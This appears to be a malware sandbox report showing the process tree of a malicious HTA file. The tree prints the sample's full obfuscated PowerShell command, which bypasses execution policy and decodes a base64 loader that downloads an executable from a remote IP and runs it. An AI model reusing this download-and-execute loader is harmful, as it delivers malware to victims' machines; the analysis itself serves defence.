| ZeroBOX

iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\gdfvr.hta.html
2620
- iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2620 CREDAT:145409
  2708
  - cmd.exe "C:\Windows\system32\cmd.exe" "/C pOWersHell -Ex ByPasS -Nop -w 1 -c DeViCeCrEdENTialDeployMEnT.ExE ; IEx($(iEX('[SYsTEm.TexT.ENcoDiNg]'+[ChaR]0x3a+[CHar]0x3a+'uTF8.gEtsTRIng([sYStEM.CONvErt]'+[CHar]58+[Char]0x3a+'FROMBase64stRinG('+[cHAR]0x22+'JG5jZTFnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJlckRFZkluSXRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbE1vbi5EbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtOQVRMcHJ3bixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgblVvcFRLaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV0pmSkRBQlVIdCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6WSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0NuWmRuV1RjRik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAicnpodUt6ZVR6IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElNclggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbmNlMWc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTczLjE0My40Ni9NMTUwN1QvY3Nyc3MuZXhlIiwiJGVuVjpBUFBEQVRBXGlnY2N1LmV4ZSIsMCwwKTtzVEFSdC1zTGVlcCgzKTtzVEFyVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGlnY2N1LmV4ZSI='+[cHAr]0X22+'))')))"
    2948
    - powershell.exe pOWersHell -Ex ByPasS -Nop -w 1 -c DeViCeCrEdENTialDeployMEnT.ExE ; IEx($(iEX('[SYsTEm.TexT.ENcoDiNg]'+[ChaR]0x3a+[CHar]0x3a+'uTF8.gEtsTRIng([sYStEM.CONvErt]'+[CHar]58+[Char]0x3a+'FROMBase64stRinG('+[cHAR]0x22+'JG5jZTFnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJlckRFZkluSXRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbE1vbi5EbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtOQVRMcHJ3bixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgblVvcFRLaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV0pmSkRBQlVIdCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6WSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0NuWmRuV1RjRik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAicnpodUt6ZVR6IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElNclggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbmNlMWc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTczLjE0My40Ni9NMTUwN1QvY3Nyc3MuZXhlIiwiJGVuVjpBUFBEQVRBXGlnY2N1LmV4ZSIsMCwwKTtzVEFSdC1zTGVlcCgzKTtzVEFyVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGlnY2N1LmV4ZSI='+[cHAr]0X22+'))')))"
      3008
      - csc.exe "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\7oxv2cf7.cmdline"
        2372
        
        cvtres.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RESAD34.tmp" "c:\Users\test22\AppData\Local\Temp\CSCAC96.tmp"
        2384

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents